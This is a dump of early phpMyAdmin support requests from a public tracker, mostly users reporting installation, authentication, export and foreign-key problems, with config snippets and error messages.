Original URL https sourceforge.net p phpmyadmin support requests 401 https sourceforge.net p phpmyadmin support requests 401 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","2218","can t insert if relations installed.
Hello, when relations are defined for a table definition, I can t insert a row with the insert tag the form is partialy loaded i.e I have the first field, then an half of the second, and then nothing more) If I delete my relation table, the insert works.
I have an Apache server, php 4.2.3, mysql 3.23.52 and phpMyAdmin 2.5.5 pl1 thanks Michel Original URL https sourceforge.net p phpmyadmin support requests 402 https sourceforge.net p phpmyadmin support requests 402 Original author mike56","bug"
"24444","2219","Cannot modify header information.
When viewing the front page, the access denied message has 6 Cannot modify header information headers already sent by error messages, all pointing to \libraries\auth\config.auth.lib.php.
Line numbers 61, 14, 15, 16, 17 and 20.
I am using PHP 4.3.4, Apache 1.3.29 and mySQL 4.0.17.
Original URL https sourceforge.net p phpmyadmin support requests 403 https sourceforge.net p phpmyadmin support requests 403 Original author scribeofthenile","bug"
"24444","2220","Export Compression Problem.
http scriptsdb.org HostRocketPHPAdmin.png PHP 4.3.3 PHPMyAdmin 2.5.2 Before they upgrade PHPMyadmin on th server we had choices for Export compression none , zip and gzip .
Now that they upgraded the Admin, we only have none as stated by the above picture.
And the support tell us that when they log server side on our account they see the 3 choices, but when we log on we dont see them.
They say it s a problem on our side which I doubt) because we are 2 people using this account and none of us see other choices.
I want to know what could cause this and how to get compression back so we can back up effeciently our MySQL DB.
Thank You David Original URL https sourceforge.net p phpmyadmin support requests 404 https sourceforge.net p phpmyadmin support requests 404 Original author panodude Found in version 2.5.2","bug"
"24444","2221","Design?.
HI, im a favorit user of phpmyadmin.
phpmyadmin is avable for all my users.
I m allowd to edit the design?
sorry for my english) Thks Dennis Original URL https sourceforge.net p phpmyadmin support requests 405 https sourceforge.net p phpmyadmin support requests 405 Original author anonymous Found in version 2.5.3","bug"
"24444","2222","PHPMyAdmin configuration.
I have problems with configuration.
I have Apache.
1\.
config.inc.php Where will I find values for host user password authentication 2\.
Where will I find webservers document root?
Is it c program files apache group apache2 htdocs?
Are all info in Apache config file?
Original URL https sourceforge.net p phpmyadmin support requests 406 https sourceforge.net p phpmyadmin support requests 406 Original author anonymous","bug"
"24444","2223","Export data; javascript omission.
On the Export page of a database table Selecting a different export data type SQL, LaTeX, CSV, XML) by clicking on the radio button changes the contents of the neighbouring SQL options box.
Clicking on the text beside said radio buttons, however, does not change the contents of the SQL options box, although it does select the appropriate radio button.
Original URL https sourceforge.net p phpmyadmin support requests 407 https sourceforge.net p phpmyadmin support requests 407 Original author raumkraut","bug"
"24444","2224","XML Export Saving as file.
jdemello apcinc.com Either I don t understand the Save as file feature when exporting data as XML or it doesn t work.
The XML appears in the browser just fine, but I can t seem to get phpMyAdmin to actually save the XML as a text file.
How can I get this to work?
Original URL https sourceforge.net p phpmyadmin support requests 408 https sourceforge.net p phpmyadmin support requests 408 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","2225","Problems with the list.
Hi again, How can I get periodically the latest translations files in my email box?
And also, of course, how can I update the translations?
thanks axier Original URL https sourceforge.net p phpmyadmin support requests 409 https sourceforge.net p phpmyadmin support requests 409 Original author anonymous","bug"
"24444","2226","500 error.
I have just upgraded my PHP to 4.3.3 and phpMyAdmin started giving me out 500 error.
error log showed me premature end of script headers .
Any ideas?
Original URL https sourceforge.net p phpmyadmin support requests 410 https sourceforge.net p phpmyadmin support requests 410 Original author anonymous","bug"
"24444","2227","i need the local host.
i m in the prosess of designing a website which needs myphpadmin, mysql, the website i nicked the user area php script from says it will set up my database from the site i just have to enter in my local host, username, password, and so on.
my problem is that i need to know the localhost name, i m told it s myusername localhost, but i need to know what the localhost is!!!!
is it http www.freepgs.com pma or ftp.freepgs.com or 3.23.58. all my site tells me is that my host is MySQL 3.23.58 running on localhost as bacon116 localhost!!!!!!!!!
Please help!!!!
manythanks Peter Original URL https sourceforge.net p phpmyadmin support requests 411 https sourceforge.net p phpmyadmin support requests 411 Original author anonymous","bug"
"24444","2228",".htaccess.
I have got phpmyadmin 2.2.6 installed on my RAQ3 ......
I ve edited the httpd file to allow multiple virtual sites to access the central phpmyadmin directory.
I have to problems as far as I can see...... Firstly...... is setting security for each site to only allow site admins to access the index page.
Secondly ...... is allowing each site to only have access to their own database.
Any help would be greatly appreciated!
Regards Nick kaptain.k kss uk.co.uk Original URL https sourceforge.net p phpmyadmin support requests 412 https sourceforge.net p phpmyadmin support requests 412 Original author anonymous","bug"
"24444","2229","Import XML dump back into MySQL db?.
I recently lost my MySQL database contents and all I have is an XML dump that I made.
Is it possible to reconstitute the db using that XML dump?
If so, would you mind explaining?
Original URL https sourceforge.net p phpmyadmin support requests 413 https sourceforge.net p phpmyadmin support requests 413 Original author thinkstoomuch Found in version 2.5.2","bug"
"24444","2230","Can t use http Auth.
Method.
I m trying to password protect PHPMyAdmin on Windows.
I m using the http authentication method.
I can t seem to login, however.
I enter the username and password I specified in the file the controluser and controlpass), but they do not work.
Everything works fine when I switch back to config mode.
Any ideas whats wrong?
Original URL https sourceforge.net p phpmyadmin support requests 414 https sourceforge.net p phpmyadmin support requests 414 Original author jmana9 Found in version Latest Git","bug"
"24444","2231","can not figure out cookie mode.
i am Running under IIS6.
in config mod everything runs like a dream no problems but when i put auth type into cookie mode i get This in the browser window when i bring up my phpMyAdmin directory and clues????
Warning main .
libraries auth coookie.auth.lib.php) failed to open stream No such file or directory in C \Inetpub\www.mrtechguy.com\phpMyAdmin\libraries\c ommon.lib.php on line 921 Fatal error main ) Failed opening required .
libraries auth coookie.auth.lib.php include path= .
;c \php4\pear ) in C \Inetpub\www.mrtechguy.com\phpMyAdmin\libraries\c ommon.lib.php on line 921 Original URL https sourceforge.net p phpmyadmin support requests 415 https sourceforge.net p phpmyadmin support requests 415 Original author anonymous","bug"
"24444","2232","Having a problem installing.
We are having a probelm installing phpadmin and have the following error message Warning Unknown usr www users xxxx xxxxxAdmin config.inc.php) failed to open stream Permission denied in Unknown on line 0 Warning null) ) Failed opening usr www users xxxxxx xxxxxx phpMyAdmin config.inc.p hp for inclusion include path= .
usr local lib php ) in Unknown on line 0 Can you point us in the right direction.
Thanks Sian.
sian kidzpicz.com Original URL https sourceforge.net p phpmyadmin support requests 416 https sourceforge.net p phpmyadmin support requests 416 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","2233","MySQL client upgrade?.
I have been using phpMyAdmin for a while on Mac OS X and I m now installing it on Windows XP.
I m running Apache 1.3.29 and PHP 4.3.4 and MySQL 5.0.0.
Here s the error I get when connecting via config Server localhost Error MySQL said 1250 Client does not support authentication protocol requested by server; consider upgrading MySQL client I m sure the username password are correct.
This doesn t make any sense since I m already using the latest version of MySQL.
Does anyone know how to fix this problem?
I get essentially the same error with both 2.5.5 pl1 and 3.
5.6 rc1.
Thanks.
bbaumer wesleyan.edu Original URL https sourceforge.net p phpmyadmin support requests 417 https sourceforge.net p phpmyadmin support requests 417 Original author anonymous Found in version 2.5.5","bug"
"24444","2234","Connection through named pipes.
Hi, I ve configured my Windows 2000 MySQL server to work only in socket mode.
I can connect to it with the dos program.
I ve modified the config.inc.php to use socket connection but when I connect, I always got the same error message 2003 Can t connect to MySQL server on localhost 10061) ======================= Here is the configuration lines cfg[ Servers ][ i][ host ] = localhost ; MySQL hostname or IP address cfg[ Servers ][ i][ port ] = ; MySQL port leave blank for default port cfg[ Servers ][ i][ socket ] = php ; Path to the socket leave blank for default socket cfg[ Servers ][ i][ connect type ] = socket ; How to connect to MySQL server tcp or socket ) cfg[ Servers ][ i][ compress ] = FALSE; Use compressed protocol for the MySQL connection ======================= What s wrong in my config ?
Original URL https sourceforge.net p phpmyadmin support requests 418 https sourceforge.net p phpmyadmin support requests 418 Original author hegtora Found in version 2.5.5 pl1","bug"
"24444","2235","Shown database for users in romte connection.
When using a remote connection withh phpMyAdmin the users can t see there own database.
only a full system control user) When using a local phpMyAdmin installation there is no problem.
The users are configured with the host table option in MySQL MySQL 4.0.17 standard log phpMyAdmin 2.5.5 pl1 Original URL https sourceforge.net p phpmyadmin support requests 419 https sourceforge.net p phpmyadmin support requests 419 Original author vanbroup Found in version 2.5.5 pl1","bug"
"24444","2236","The host name is Empty!.
i have just started with all this stuff, and i edited the config.inc.php with the info that is needed host, user, password and authentication mode) but when i access the file index.php it says host name is empty.
if anyone could help me on aim its tripps2002, so thanks.
Original URL https sourceforge.net p phpmyadmin support requests 420 https sourceforge.net p phpmyadmin support requests 420 Original author uriko","bug"
"24444","2237","First record from BROWSE or SELECT query omitted.
When browsing or selecting records from a table in phpMyAdmin 2.5.5pl1, the first record is omitted.
If the select result is one record, no records are displayed.
See attached file 2 records returned numbered 0 and 1), only one displayed.
Browser IE6.0 MySQL 3.23.51 phpMyAdmin 2.5.5 pl1 Submitted by david.cavalla ntlworld.com Original URL https sourceforge.net p phpmyadmin support requests 421 https sourceforge.net p phpmyadmin support requests 421 Original author anonymous","bug"
"24444","2238","sql.php seg faults w PHP4.3.4 on FreeBSD 4. sql.php seg faults w PHP4.3.4 on FreeBSD 4.
Tried the latest 2.5.5 pl1, doesn t help.
If you don t supply a sql query variable in the post it does not seg fault.. tried disabling the SQL parser and the ShowSQL did not help.
Original URL https sourceforge.net p phpmyadmin support requests 422 https sourceforge.net p phpmyadmin support requests 422 Original author ngaugler","bug"
"24444","2239","PHP MyAdmin.
I have been recommended to upgrade my version to the latest 2.5.5 I have a RAQ3 with virtual sites that I would like to all have access I have downloaded the tar.gz file file and expanded it to usr local download I am unsure how to now install upgrade the program ???
I have trawled the net but nothing seems to give me any installation instuctions.......
Please help!
kaptain.k kss uk.co.uk Original URL https sourceforge.net p phpmyadmin support requests 423 https sourceforge.net p phpmyadmin support requests 423 Original author anonymous","bug"
"24444","2240","phpMyAdmin on my laptop?.
I have MySql working perfectly off my laptop with an Apache Server.
Is it possible to us phpMyAdmin in conjuction with this?
If so how do I configure the cfgPmaAbsoluteUri variable.
This is what I m currently trying.
Does it look right?
when I try to open index.php3 in the browser it merely tells me Cannot find server .
cfgPmaAbsoluteUri = C \Program Files\phpMyAdmin 2.2.7 pl1 php\phpMyAdmin 2.2.7 pl1\\ ; Please help Original URL https sourceforge.net p phpmyadmin support requests 424 https sourceforge.net p phpmyadmin support requests 424 Original author jakeandjemma","bug"
"24444","2241","Unclosed Quote Problem with MySQL.
Hi folks...
I am using the latest version of phpMyAdmin 2.5.5 pl1).
Everything worked fine, until I tried running a few queries to change the character set.
The queries did run, but ever since nothing SQL wise works, because quotes are inserted with an artificial backslash \).
For example, DELETE FROM aTable WHERE id=\ 1234\ ; This, of course, is not acceptable by MySQL.
The same behaviour I also get with 2.5.6 rc1.
Any workaround?
Cheers, Dimitris Original URL https sourceforge.net p phpmyadmin support requests 425 https sourceforge.net p phpmyadmin support requests 425 Original author anonymous Found in version 2.5.6 rc1","bug"
"24444","2242","Relation view doesn t produce any pages.
I try to make a relation view of my tables.
I v filled relation , table coords and pdf pages variables... Also editted the relations for the tables.
However, when i want to produce the pages I get the following error Fatal error No parent class available in this context in home www phpMyAdmin pdf schema.php on line 128 I m flabbergasted..... Also tried 2.5.5pl1.
After tweak a file in libraries something with absent get mysql client info ) ) I get the same different line) error....
Original URL https sourceforge.net p phpmyadmin support requests 426 https sourceforge.net p phpmyadmin support requests 426 Original author anonymous","bug"
"24444","2243","CREATE DATABASE privilege under special circunstances.
phpMyAdminVersion 2.5.6 rc2 PHP Version 4.3.3 and 4.3.4 MySQL Version 3.23.49 log and 4.0.17 log Having A database using underscores to define the db name as in my database db mysql.db privileges as localhost, my database db, USER, Y, Y, Y, Y, Y, Y, N, N, N, N, N, N AND mysql.user privileges as localhost, USER, PASSWORD PASSWORD), N, N, N, N, N, N, N, N, N, N, N, N, N, N AND cfg[ Servers ][ i][ auth type ] = http ; When this user access phpMyAdmin can see the DB creation form not sure is this is a bug) but if this user create a new database using wildcards ?
or ) instead of underscore as in my?database db my database?db my?database?db my database db ...
The user will succesfully create the new database and the privileges of my database db DB will be applied to the new DBs.
I mean... the customer will have a lot of DBs for the price of just one) D Original URL https sourceforge.net p phpmyadmin support requests 429 https sourceforge.net p phpmyadmin support requests 429 Original author midget Found in version 2.5.6 rc2","bug"
"24444","2244","PhpMyAdmin multi user install troubles, help needed....
I have a win2003 server IIS6 and have been having fits loggin in to the MyPhpAdmin using a superuser account or any account for that matter).
No matter how much I read and look around, mutitude of user permission checks and a few changes, fluhing privlages restarting the server, deleting the cookie so I can try to log in again, I consinstantly get Error MySQL said 1045 Access denied for user ctl usr ka boom Using password YES) FYI I created a user ctl usr and changed user name from pma to ctl user in the create table.sql to grant the permissions properly I have read the docs 50 times, made sure I understood them At least as far as a mutlti user env.)
re read them again 20 times.
I used the create tables.sql in the scripts folder chose to use cookie authentication, made certain the ctl usr has the correct table permissions on the mysql db, made certain that the config.inc.php file had the correct user and pass in the cfg[ Servers ][ i][ controluser ]= ctl usr string and cfg[ Servers ][ i][ controlpass ] string I have made certain that the cfg[ Servers ][ i] [ pmadb ] string is set to the phpmyadmin db and still having the same troube 2 days later.....
I have read so many possible answers, deleting the standard default user accounts and creating my own.
I use sqllog and winmysqladmin.exe and have no trouble using any of the super user names I have created, I can see all of the db s If anyone wants to see my infp.php or a report, let me know..
If any one here can shed some light please respond, your time will be appreciated !
Glenn Original URL https sourceforge.net p phpmyadmin support requests 430 https sourceforge.net p phpmyadmin support requests 430 Original author glenh Found in version 2.5.5 pl1","bug"
"24444","2245","Problems getting phpMyAdmin on new Redhat Fedora system.
I just installed phyMyAdmin 2.5.6 rc1 on a newly installed Fedora FC1 system.
I m getting the following error lt;b gt;Fatal Error lt; b gt;main ) Failed opening required .
libraries auth cookie.auth.lib.php I ve tried tinkering with the include path and open basedir settings in various places including etc php.ini and .htaccess I would appreciate specific guidance on how to get this to work.
Radi Original URL https sourceforge.net p phpmyadmin support requests 427 https sourceforge.net p phpmyadmin support requests 427 Original author aceflyer Found in version 2.5.6 rc1","bug"
"24444","2246","Where is php.ini located?.
In [1.16] of the FAQ section of Documentation.html, it says in the php.ini configuration file.
My question is, where exactly is the php.ini configuration file?
Original URL https sourceforge.net p phpmyadmin support requests 428 https sourceforge.net p phpmyadmin support requests 428 Original author zimnick","bug"
"24444","2247","[2.5.6 rc2] No SQL query!.
No SQL query!
I try to import a file.
test [2004 02 18 17 52].sql 10.86MB 11,383,899 bytes) I get No SQL query!
In php.ini max execution time = 120 memory limit = 21M post max size = 20M upload max filesize = 19M If it help you on SQL page I see Or Location of the textfile Max 19,456KB) I also try to make small test [2004 02 18 17 52].sql Then import went Ok. What I have to do?
Original URL https sourceforge.net p phpmyadmin support requests 431 https sourceforge.net p phpmyadmin support requests 431 Original author makc666","bug"
"24444","2248","invalid management of foreign key constraints.
mysql 4.1.0 localhost php 4.3.3 Table Type InnoDB If a table has more than 1 foreign key constraints, the Relation view has severe problems 1.)
If the table was created outside phpmyadmin, the Relation view displays only one relation but not always the first one!).
For the remaining relations, the on update column is filled correctly, but not the Key column 2.)
Modifying the relations leads to invalid Foreign key constraints.
Example Run following 3 commands CREATE TABLE `Tab1` `F1` int 11) NOT NULL default 0 , `F2` varchar 64) default NULL, PRIMARY KEY `F1`) ) TYPE=InnoDB CHARSET=latin1; CREATE TABLE `Tab2` `F1` int 11) NOT NULL default 0 , `F2` varchar 32) default NULL, PRIMARY KEY `F1`) ) TYPE=InnoDB CHARSET=latin1; CREATE TABLE `Tab3` `F1` int 11) NOT NULL default 0 , `F2` int 11) NOT NULL default 0 , `F3` varchar 64) default NULL, KEY `F1` `F1`), KEY `F2` `F2`) ) TYPE=InnoDB CHARSET=latin1; Then go to Relation view of Tab3 AT the InnoDB part select for field F1 Tab1 gt;F1, on update CASCADE press OK go to Export and check the table strcture 1 foreign key constraint was added everthing o.k.
Then go to Relation view of Tab3 again AT the InnoDB part select for field F2 Tab2 gt;F1, on update CASCADE press OK The dropdownbox automacigally changes to Tab1 gt;F1 !!)
and 2 !)
constraints are added to the table structure!
Tab3 now has 3 !)
constraints SHOW CREATE TABLE Tab3 returns CREATE TABLE `Tab3` `F1` int 11) NOT NULL default 0 , `F2` int 11) NOT NULL default 0 , `F3` varchar 64) default NULL, KEY `F1` `F1`), KEY `F2` `F2`), FOREIGN KEY `F2`) REFERENCES `Tab2` `F1`) ON UPDATE CASCADE, FOREIGN KEY `F1`) REFERENCES `Tab1` `F1`) ON UPDATE CASCADE, FOREIGN KEY `F1`) REFERENCES `Tab1` `F1`) ON UPDATE CASCADE ) TYPE=InnoDB CHARSET=latin1 Original URL https sourceforge.net p phpmyadmin support requests 432 https sourceforge.net p phpmyadmin support requests 432 Original author norzaw","bug"
"24444","2249","Edit Table.
I am sure this is simple.
My PostNuke Web Links module contains almost 6000 links.
One of the mySQL tables has a column that contains the link description.
When I inserted the text file I thought I had everything perfect.
However, the description field, all 6000 of them contain a date time 0000 00 00 00 00 00.
All I want to do is remove the 0000 00 00 00 00 00 and leave a blank or empty field.
I will fill in the descriptions later.
How do I do this in phpMyAdmin?
phpMyAdmin 2.5.6 rc1 MySQL 4.0.17 Max Thank you, Joe Dunn Original URL https sourceforge.net p phpmyadmin support requests 433 https sourceforge.net p phpmyadmin support requests 433 Original author joedunn1232","bug"
"24444","2250","Complete Nightmare.
Can someone please help, I am trying to set up my first phpnuke website and first I need to set up phpmyadmin.
NOT an easy task.
I have done as the instructions say when it comes to uploading and I think I have set up config.inc.php correctly, BUT visit http www.smallbusinessforums.co.uk myadmin index.ph p and you will see the problem.
I must say the documentation supplied is pretty useless.
Can someone PLEASE tell me what s wrong???
I am on msn messenger as virtualkey2004 hotmail.com and yahoo messenger as virtualkeydesign Many Thanks Gary Original URL https sourceforge.net p phpmyadmin support requests 434 https sourceforge.net p phpmyadmin support requests 434 Original author anonymous","bug"
"24444","2251","Accessing phpMyAdmin from another computer remote access).
This is how my current set up actually works when I login to phpmyadmin on the server it is installed on.
On the server, I login to http localhost phpmyadmin with cfg[ PmaAbsoluteUri ] = ; This works, the PHPMyAdmin picture in the upper left corner displays, and all links work.
But, it says The cfg [ PmaAbsoluteUri ] directive MUST be set in your configuration file!
so I figure that I should do this http localhost phpmyadmin with cfg[ PmaAbsoluteUri ] = http localhost phpmyadmin ; This works perfectly.
No errors or problems whatsoever.
The problem I have is I want to access phpMyAdmin from another computer on my network, not just the server it is installed on.
So I tried it by IP and DNS name On the server, login to http 20.69.24.42 phpmyadmin OR http depusaahp2 phpmyadmin Both ways I get Forbidden You don t have permission to access phpmyadmin on this server.
Apache 2.0.47 Win32) mod ssl 2.0.47 OpenSSL 0.9.7b PHP 4.3.2 Server at 20.69.24.42 Port 80 I think the message is coming from PHP, not the Apache2 webserver because the error message does not match any of the one s on apache s list.... All I want to do is access phpMyAdmin from my laptop instead of the server it s installed on!
Original URL https sourceforge.net p phpmyadmin support requests 435 https sourceforge.net p phpmyadmin support requests 435 Original author pimptek77 Found in version 2.5.1 rc1","bug"
"24444","2252","new 2.5.6 install Error 2002.
I just installed phpmyadmin 2.5.6 and put my user and password into config.inc.php and then tried to open the index.php page but all I get is this error 2002 Can t connect to local MySQL server through socket var lib mysql mysql.sock 111) I checked the socket and it is there.
I can log into mysql without any problem from the command line using the same user and password.
Any suggestions on how to fix this?
Original URL https sourceforge.net p phpmyadmin support requests 436 https sourceforge.net p phpmyadmin support requests 436 Original author grenoml","bug"
"24444","2253","Unwanted NOW value in TIMESTAMPS.
I have a couple of TIMESTAMP values in my database.
I see that the function is set to NOW ) by default.
So, every time I update a field in the database, the corresponding Timestamp is overwritten by the current time.
This is not what I want.
So I wonder how all my Timestamp got that NOW ) by default.
And how I can remove it.
Jon Bendik Helland, Norway, jon bytaxi.no Original URL https sourceforge.net p phpmyadmin support requests 437 https sourceforge.net p phpmyadmin support requests 437 Original author anonymous","bug"
"24444","2254","The page cannot be found.
Ive just installed PHP 4.3.4 and MySQL 4.0.18 onto my WinXp computer.
Im running it under my IIS and everything is working fine, pages load, phpinfo looks all good.
I installed phpMyAdmin 2.3.0 what I had on my old server) and when i try and goto phpMyAdmin it keeps coming up with The page cannot be found but its not that it cant find the folder because it loads the first file and I get the frames and both dont load.
I thought it was something to do with the Authentication settings in the config.inc.php file so i change it and when ive got the wrong pass in it comes up with.
1045 Access denied for user root localhost Using password YES) As far as I know everything should be working.
At one stage the menu frame loaded up but when I selected a table from the pull down menu the menu page then came up with The page cannot be found .
Ive tried useing old backup copies of phpMyAdmin and it still give the same problems.
Ive search google looking for other people with the same problem and only found one person but there problem wasnt solved either.
Ive run out of ideas and needs someone with a little more skill then myself.
Original URL https sourceforge.net p phpmyadmin support requests 438 https sourceforge.net p phpmyadmin support requests 438 Original author anonymous","bug"
"24444","2255","PHPmyAdmin cookie problem.
I was running PHPmyAdmin 2.2.3 on my IIS Server and I had it set on cookie authentication and it all worked fine.
Then I upgraded to 2.5.5 pl1 and now it will log in using config authentication but not cookie authentication.
There is no error message the form just reappears blank.
If I test it on my local machine Windows 2000 Professional with IIS 5) it works as it should so I don t think it can be the browser.
I ve also tested it with various flavours of Netscape and got the same result.
The server I am trying to run it on is a Windows NT 4 Server which has IIS 4 installed.
Both machines are running MySQL 4.0.18 nt and PHP 4.3.0 running as CGI).
Has anyone else come across this problem and or know how to fix it.
I have already posted this problem to the forum with no response http sourceforge.net forum forum.php?
thread id=1024908 forum id=72909) My email address is rachel.green1 lineone.net Original URL https sourceforge.net p phpmyadmin support requests 439 https sourceforge.net p phpmyadmin support requests 439 Original author anonymous","bug"
"24444","2256","suggestion.
Would like to see an end of row delimiter added to the CSV export option.
Something like a semi colon.
Not too partial to the Excel CSV option as this usually screws up the timestamp datestamp data as well as a other related issues.
Why am I using Excel?
Well, if the good folk at phpmyadmin could find an easier way of moving columns of data around in a table then I wouldn t have to export to Excel, move that column and then import the data back into mySQL.
Could write an SQL statement to drop columns, etc but usually end up screwing up the data because something got let out somewhere.
How about it the moving column thing I mean?
TIA Original URL https sourceforge.net p phpmyadmin support requests 440 https sourceforge.net p phpmyadmin support requests 440 Original author anonymous","bug"
"24444","2257","Says.
First excuse me for my bad english.
Someone could help me?
I have installed some new versione after 2.2.1 and all, when i want to do a dump of datas, says export.php Missing what.
I tried to change the configuration but nothing to do.
I have installed php 4.3.1 mysql 4.0.15, win XP H.E.
Version 2.2.1 works fine.
Thanks a lot Michele nitropozzy mail.it Original URL https sourceforge.net p phpmyadmin support requests 442 https sourceforge.net p phpmyadmin support requests 442 Original author anonymous Found in version 2.5.6","bug"
"24444","2258","Menu Frame Timeout.
I have a copy of phpMyAdmin installed on a large webhost, it is using HTTP authentication to allow any user on the server to manage their database through the one copy of phpMyAdmin.
The problem is that the left menu frame takes ages to load and eventually runs out of execution time.
Each user has only one database so I tried setting the only db setting to the currently logged in user but that didn t help.
Is there a way the code can be optimised or is there a hack I can do to fix this?
There is a large number of databases on one server and as I said before each user has access to only one database.
Original URL https sourceforge.net p phpmyadmin support requests 441 https sourceforge.net p phpmyadmin support requests 441 Original author mazadillon","bug"
"24444","2259","Can t add any fields.
This is a MySQL 4.0.17 database.
I am using the newest version of php myadmin.
Whenever I try to do almost anything especially add a new field for some changes I m trying to do for a forum) I keep getting a FILE NOT FOUND error.
It won t let me add anything.
Original URL https sourceforge.net p phpmyadmin support requests 443 https sourceforge.net p phpmyadmin support requests 443 Original author anonymous","bug"
"24444","2260","queries.
I m interested in creating some custom php pages that will query mysql databases with form entry fields.
Attached is a screen shot form the php MyAdmin provided by my web hosting company, Cedant.
Can you direct me to some tutorial pages that can help with the coding?
Thanks, Gary g linxvisual.com Original URL https sourceforge.net p phpmyadmin support requests 444 https sourceforge.net p phpmyadmin support requests 444 Original author anonymous","bug"
"24444","2261","Install Issue.
How do I install phpmyadmin for multiple users like shown on the following web page http serv1.50free.com pma email back at 91347 blackpool.ac.uk Thanxs Original URL https sourceforge.net p phpmyadmin support requests 445 https sourceforge.net p phpmyadmin support requests 445 Original author anonymous Found in version 2.5.6 rc2","bug"
"24444","2262","no preview for blob fields.
there is no possibility to display the value of a blob field.
Original URL https sourceforge.net p phpmyadmin support requests 446 https sourceforge.net p phpmyadmin support requests 446 Original author dreeh","bug"
"24444","2263","field type change from varchar to char.
Using MySQL 3.23.49 with PHP 4.2.2 or MySQL 4.0.17 with PHP 4.2.4 with phpMyAdmin 2.5.6 I cannot change field type from varchar to char in the table structure.
Always all char types are changed to the varchar only.
How can I change the field type to the char type?
Original URL https sourceforge.net p phpmyadmin support requests 447 https sourceforge.net p phpmyadmin support requests 447 Original author anonymous","bug"
"24444","2264","empty page on install.
After changing the appropriate entries on the config.inc.php file and uploading all the files, I browse to the installation directory and see a blank page.
This happens no matter which authentication method I use.
Any ideas?
Eric Original URL https sourceforge.net p phpmyadmin support requests 448 https sourceforge.net p phpmyadmin support requests 448 Original author anonymous Found in version 2.5.6","bug"
"24444","2265","header errors in query window.
I installed phpmyadmin as advised in the installation instructions.
When i go to index.php to view the page i only get information in the main frame not the left hand frame.
In the left hand frame i get the following errors Warning Unable to save MySQL query result in vol home wage public html phpmyadmin libraries com mon.lib.php on line 1245 Warning Cannot add header information headers already sent by output started at vol home wage public html phpmyadmin libraries com mon.lib.php 1245) in vol home wage public html phpmyadmin libraries head er http.inc.php on line 14 Warning Cannot add header information headers already sent by output started at vol home wage public html phpmyadmin libraries com mon.lib.php 1245) in vol home wage public html phpmyadmin libraries head er http.inc.php on line 15 Warning Cannot add header information headers already sent by output started at vol home wage public html phpmyadmin libraries com mon.lib.php 1245) in vol home wage public html phpmyadmin libraries head er http.inc.php on line 16 Warning Cannot add header information headers already sent by output started at vol home wage public html phpmyadmin libraries com mon.lib.php 1245) in vol home wage public html phpmyadmin libraries head er http.inc.php on line 17 Warning Cannot add header information headers already sent by output started at vol home wage public html phpmyadmin libraries com mon.lib.php 1245) in vol home wage public html phpmyadmin libraries head er http.inc.php on line 20 Server mysql.database.ednet.co.uk Error SQL query SHOW DATABASES ; MySQL said 1045 Access denied for user name removed for security Using password YES) Does anyone have any idea whats wrong and how i can fix it?
thanks K Original URL https sourceforge.net p phpmyadmin support requests 449 https sourceforge.net p phpmyadmin support requests 449 Original author anonymous","bug"
"24444","2266","Too Many Parse Errors.
I am running SuSE Linux 9 PE w Apache 2.0, PHP 4.3.3, MySQL 4.0.15.
When I try to run phpMyAdmin for the first time, I get far too many parse errors.
I have looked extensively at the config file and nothing is wrong with it.
Original URL https sourceforge.net p phpmyadmin support requests 450 https sourceforge.net p phpmyadmin support requests 450 Original author anonymous Found in version 2.5.6","bug"
"24444","2267","InnoDB tables display wrong number of records.
MySQL 4.0.17, PHP 4.3.4 on Mac OS X 10.3.3 InnoDB tables give a wrong number of records in database view) and cardinality of indexes when viewing table structure).
The wrong number is not fixed is it usually different but still incorrect) afer a page reload.
Original URL https sourceforge.net p phpmyadmin support requests 451 https sourceforge.net p phpmyadmin support requests 451 Original author jpkunst","bug"
"24444","2268","HTTP Auth.
Reply Email Address support phlipit.com No matter how many changes I make to config.inc.php, users are not able to login to phpMyAdmin.
I really don t understand what could possibly be going wrong.
Is there any way someone can send me a pre configured config file where all I have to change is the host name, etc.?
I tried reading the documentation and it didn t help.
If you login as root it works fine, but logging in as anyone else won t work.
Original URL https sourceforge.net p phpmyadmin support requests 452 https sourceforge.net p phpmyadmin support requests 452 Original author anonymous Found in version 2.5.6","bug"
"24444","2269","Passwords become lowercase.
Hi, Since I did upgrade from MySQL 3.5.x to MySQL 4.x When I create an user with PHPMyAdmin 2.5.6 the password the user must type becomes lower case.
So when I set up a password like ItsMyPassword the login will only work if the user types itsmypassword Old converted) accounts with uppercase letters in the passwords are still working fine.
DJ Original URL https sourceforge.net p phpmyadmin support requests 453 https sourceforge.net p phpmyadmin support requests 453 Original author djwice","bug"
"24444","2270","How do i add users to a database.
I rememner that the i is a away, i searched through the documentation but i cannot find anything very useful to my problem.
i ve searched through the config file and set most relevent things to on true).
i can t find anything.
help?
someone with a userless database Original URL https sourceforge.net p phpmyadmin support requests 454 https sourceforge.net p phpmyadmin support requests 454 Original author anonymous Found in version 2.5.6","bug"
"24444","2271","less granularity please.
2.5.6 insists on getting passwords more often than necessary in small one user setups.
Also, it seems to distinguish between 127.0.0.1 and rendezvous name.local, although these point to the same object.
In any case, phpMyAdmin is developing some feature creep with unintended or worse, intended) consequences.
I d appreciate less headscratching and more out of the box workability, since the LAST thing I need is one more layer of problems.
grikdog pobox.com Original URL https sourceforge.net p phpmyadmin support requests 455 https sourceforge.net p phpmyadmin support requests 455 Original author anonymous","bug"
"24444","2272","CSV Upload Problems.
When trying to upload a cvs file into a table I always get the same error Error SQL query LOAD DATA INFILE D \\Appl\\PHP\\uploadtemp\\php25.tmp INTO TABLE `test` FIELDS TERMINATED BY ; ENCLOSED BY ESCAPED BY \\ LINES TERMINATED BY \r\n MySQL said File D \Appl\PHP\uploadtemp\php25.tmp not found Errcode 2) I already checked the upload temp value in my php.ini file and it seems to be correct to me.
However the thing is, that mysql runs on a separte server and the phpmyadmin tool inkl.
all other sites, are running on a other server webserver).
Might this be a problem?
Any tips and hints are very welcome.
thank you Mike Original URL https sourceforge.net p phpmyadmin support requests 456 https sourceforge.net p phpmyadmin support requests 456 Original author anonymous Found in version 2.5.1","bug"
"24444","2273","Another Complete Problem.
I am setting up my first ldu site and i am cluless i m supposed to upload an sql file for a database but i have noclue how to create the database and stuff contact me here xdbplanetx yahoo.com or YIM at xdbplanetx Original URL https sourceforge.net p phpmyadmin support requests 457 https sourceforge.net p phpmyadmin support requests 457 Original author anonymous","bug"
